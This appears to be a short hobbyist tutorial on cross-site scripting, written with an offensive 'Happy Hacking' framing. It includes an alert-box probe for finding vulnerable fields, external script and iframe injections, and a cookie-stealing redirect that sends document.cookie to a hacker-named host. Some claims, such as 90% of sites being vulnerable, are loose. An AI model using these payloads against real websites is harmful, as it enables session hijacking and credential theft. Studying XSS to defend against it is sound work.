Basics of XSS Hacking

Basics of XSS Hacking
Cross-site scripting (Popularly known as XSS) and SQL injection errors are two prominent vulnerabilities that have been responsible for a large number of security breaches in recent years. XSS is a huge problem in current scenario as most of the web developers are even not aware of this kind of attack. The basic differences between SQL Injection & XSS are:

SQL Injection is the injection of SQL Statements whereas XSS is the Injection of Codes (It can be Javascript, PHP code, VB Code or even regular HTML Codes.
SQL Injection is injecting a SQL statement into the query execution function in the server side script. But, XSS can be both Client & Server Side. (Stored or persistent XSS is Server Side whereas Non-persistent is Client Side as an attacker needs to insert code each time.)

Together XSS and SQL Injection is the most deadly combination that can be found today and more than 90% of the sites are vulnerable to any one of the following. In SQL injection, the user can add additional conditions or commands to a database query, thus allowing the user to bypass authentication or alter data. With XSS, an attacker can inject this own HTML (including JavaScript or other executable code) into a web page; this is exploitable in many ways, up to complete compromise of the browser. XSS is used by a phisher to inject credential stealing code into official sites without having to redirect the user to a copy of the site. This means that any security credentials will be valid on the attack site and even white-listing will not prevent the attack.

So, let’s start how this XSS Attack actually takes place.

XSS Attack can be of many types:
Non-persistent or reflected
DOM-based or Local cross-site scripting
Stored or persistent

Now have a look at an example. Let's say that we have a vulnerable page. A malicious user, Hacker, posts a "special_code" post, containing the following:

<script type="text/javascript" src="http://victimwebsite.com/xss.js"></script>

If the page is vulnerable, then everyone who visits the page, the browser will fetch the file located at http://victimwebsite.com/xss.js, and then execute the code in it.

How to find if a website is vulnerable to XSS?

To find out if any website is vulnerable to XSS, what you need to do is just insert the script into any search or input text field.

<script>alert(“hi”);</script>

If upon Submitting, the page return an alert with “hi” in it, then that particular website should be vulnerable to XSS Attack.

Now you can insert link to any third party website or fake login page in the script tag and that link gets stored with the original content. We can also insert links to javascripts, which will allow the hacker to run malicious code included in the javascript upon page reloading and basically hijack any session of users accessing that particular page. Session hijacking refers to the fact that the hacker can now login into the website without even victim’s username or password. This is done by inserting cookie stealing code in the javascript.

We can insert link to any image into the vulnerable website by giving the following script in the search or text input field which is vulnerable to XSS.

<iframe src=”url of the fake page” width=”1000” height=”1000” />

It can be anything like:

<iframe src=”http://www.hacker.com/hacked.jpg” width=”1000” height=”1000” />

One can also paste pages into the victim website:

<script>document.location.href="http://www.hackers.com/steal_cookies.php"+document.cookie; </script>

Hope, you enjoyed and learnt a lot.
Happy Hacking!